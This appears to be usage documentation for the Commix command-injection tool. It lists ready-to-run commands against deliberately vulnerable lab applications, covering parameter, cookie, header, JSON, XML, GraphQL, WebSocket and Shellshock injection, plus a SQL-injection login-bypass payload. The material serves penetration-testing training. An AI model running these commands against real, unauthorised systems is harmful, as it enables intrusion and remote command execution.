Usage examples

Usage examples across vulnerable applications

Commix offers comprehensive support for command injection exploitation across a wide range of backend technologies and web application environments. Its flexible payload generation and injection techniques enable it to target diverse server-side languages and frameworks, including but not limited to the most commonly used ones.

This broad compatibility allows penetration testers and security researchers to assess and exploit command injection vulnerabilities in applications developed with various programming languages and platforms, ensuring thorough and effective testing coverage.

• PHP - Classic and advanced injection scenarios in PHP applications, including cookie, header, and POST parameters.
• Python - Injection in Python-powered web services, including Flask, Django, and custom APIs.
• Perl - CGI and other Perl-based web services vulnerable to command injection.
• Ruby - Exploitation of Ruby web apps or services with injection points.
• CGI - Classic Common Gateway Interface scripts (any language) vulnerable to shell injection.
• GCH - Generic command handler-based injection points.
• ASP.NET (Experimental) - Emerging support for command injection in ASP.NET applications.
• JSP (Experimental) - Experimental handling of Java Server Pages environments.

This document presents a curated collection of Commix usage examples targeting various intentionally vulnerable applications. Each example includes:

• A short explanation of the technique or scenario.
• The vulnerable target endpoint or parameter.
• The exact command used to exploit the vulnerability.

1. Damn Vulnerable Web Application

Description:
Command injection vulnerability in vulnerabilities/exec/. DVWA offers multiple security levels, and each alters input sanitization behavior.

Below are examples of exploiting each level:

1. Low Security: Minimal filtering allows straightforward command injection via form input.

Usage example:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" \
--data="ip=127.0.0.1&Submit=submit" \
--cookie="security=low; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

2. Medium Security: Basic input validation is introduced; Commix adapts to slightly hardened filters.

Usage example:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" \
--data="ip=127.0.0.1&Submit=submit" \
--cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

3. High Security: Advanced sanitization; Commix use specific techniques (e.g., file-based injections) and awareness of web root.

Usage example:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" \
--data="ip=127.0.0.1&Submit=submit" \
--cookie="security=high; PHPSESSID=nq30op434117mo7o2oe5bl7is4" \
--technique=f \
--web-root="/var/www/html/"

---

2. php-Charts 1.0

Description:
GET-based parameter injection with custom prefix/suffix. This example demonstrates injection via a vulnerable type parameter using custom payload encapsulation to bypass basic filtering.

Usage example:

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" \
--prefix="'" \
--suffix="//"

---

3. OWASP Mutillidae

Description:
POST parameter in DNS lookup feature, with custom headers and proxy. This example uses Commix to inject via target_host while supplying additional headers and routing traffic through a proxy (e.g., Burp Suite).

Usage example:

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" \
--data="target_host=127.0.0.1" \
--headers="Accept-Language:fr\nETag:123\n" \
--proxy="127.0.0.1:8081"

---

4. Persistence

Description:
Command injection in debug.php, using alternative shell. Commix supports alternative shell types for stable exploitation; here, Python is used for environments where bash or sh are not suitable.

Usage example:

python commix.py --url="http://192.168.178.8/debug.php" \
--data="addr=127.0.0.1" \
--alter-shell="Python"

---

5. Damn Vulnerable NodeJS Application

Description:
Command injection in address parameter via NodeJS endpoint. This POST-based injection targets Node.js backends that may pass input directly to shell commands.

Usage example:

python commix.py --url="http://127.0.0.1:9090/app/ping" \
--data "address=127.0.0.1" \
--cookie="connect.sid=s%3AIdvte5ieuGQC5C8jt5aSyUTSF8xZtls8.3fwCVsyypx%2BLGXtiF1JTBrqbmjp%2B29vwKoL0uxcHub8"

---

6. Kioptrix: Level 1.1 (#2)

Description:
POST injection after authentication bypass. This command demonstrates how Commix can handle session-based injections, including logging in via --auth-url before attacking.

Usage example:

python commix.py --url="http://192.168.178.2/pingit.php" \
--data="ip=127.0.0.1E&submit=submit" \
--auth-url="http://192.168.178.2/index.php" \
--auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

---

7. Kioptrix: 2014 (#5)

Description:
GET injection with custom User-Agent and specific technique. This command uses a forged User-Agent header and a specific technique (--technique="f") against drawimage.php.

Usage example:

python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" \
--user-agent="Mozilla/4.0 Mozilla4_browser" \
--technique="f" \
--web-root="/"

---

8. CVE-2014-6271/Shellshock:

Description:
Shellshock-vulnerable CGI endpoint

Commix can exploit Bash environment variable injection flaws directly with --shellshock.

Usage example:

python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

---

9. commix-testbed (cookie)

Description:
Classic injection via cookie parameter

A simple injection through the addr cookie using classic OS command injection technique.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/cookie/cookie(classic).php" \
--level=2 \
--cookie="addr=127.0.0.1"

---

10. Example against commix-testbed (user-agent)

Description:
Classic injection through User-Agent header. Header-based injection example using -p user-agent flag.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/user-agent/ua(blind).php" \
--level=3 \
-p user-agent

---

11. commix-testbed (referer)

Description:
Command injection in Referer header. Header-based injection example using -p referer flag.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/referer/referer(classic).php" \
--level=3 \
-p referer

---

12. Flick 2

Description:
Header-based injection with custom authentication headers and base64 encoding. Useful for APIs or services expecting base64-encoded payloads and token-based auth.

Usage example:

python commix.py --url="https://192.168.2.12/do/cmd/*" \
--headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" \
--base64

---

13. commix-testbed (JSON-based):

Description:
Classic injection in JSON body, addr field. Commix detects JSON content automatically and modifies addr for injection.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/regular/POST/classic_json.php" \
--data='{"addr":"127.0.0.1","name":"ancst"}'

---

14. SickOs 1.1

Description:
Shellshock injection. The remote CGI script is vulnerable to Shellshock; traffic is routed through a local proxy.

Usage example:

python commix.py --url="http://192.168.2.8/cgi-bin/status" \
--shellshock \
--proxy="192.168.2.8:3128"

---

Damn Vulnerable GraphQL Application

Description:
GraphQL mutation and query-based command injection.

1. ImportPaste Mutation Injection:

Usage example:

python commix.py --url="http://127.0.0.1:5000/graphql" \
--data='{"query":"mutation{importPaste(host:\"commixproject.com\" , port:80 , path:\"/\" , scheme:\"http\"){result}}"}'

2. systemDiagnostics Query Injection:

Usage example:

python commix.py --url="http://127.0.0.1:5000/graphql" \
--data='{"query":"query {systemDiagnostics(username:\"admin\" , password:\"admin123\" , cmd:\"test\")}"}' \
-p cmd

---

16. commix-testbed (XML-based)

Description:
XML payload in body, addr element vulnerable.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/regular/POST/classic_xml.php" \
--data='<?xml version="1.0" encoding="UTF-8"?><ping><addr>127.0.0.1</addr><count>4</count></ping>'

---

17. Damn Vulnerable Web Sockets

Description:
WebSocket-connected backend, triggered via HTTP to WebSocket proxy.

1. Use HTTP2WebSocket to run the listener on port 3333 and connect to dvws.local:8080 web socket app on every HTTP request:

Usage example:

python HTTP2WebSocket.py -l 3333 -t ws://dvws.local:8080

2. Exploit the OS command execution:

Usage example:

python commix.py --url="http://127.0.0.1:3333/command-execution" \
--data="addr=127.0.0.1"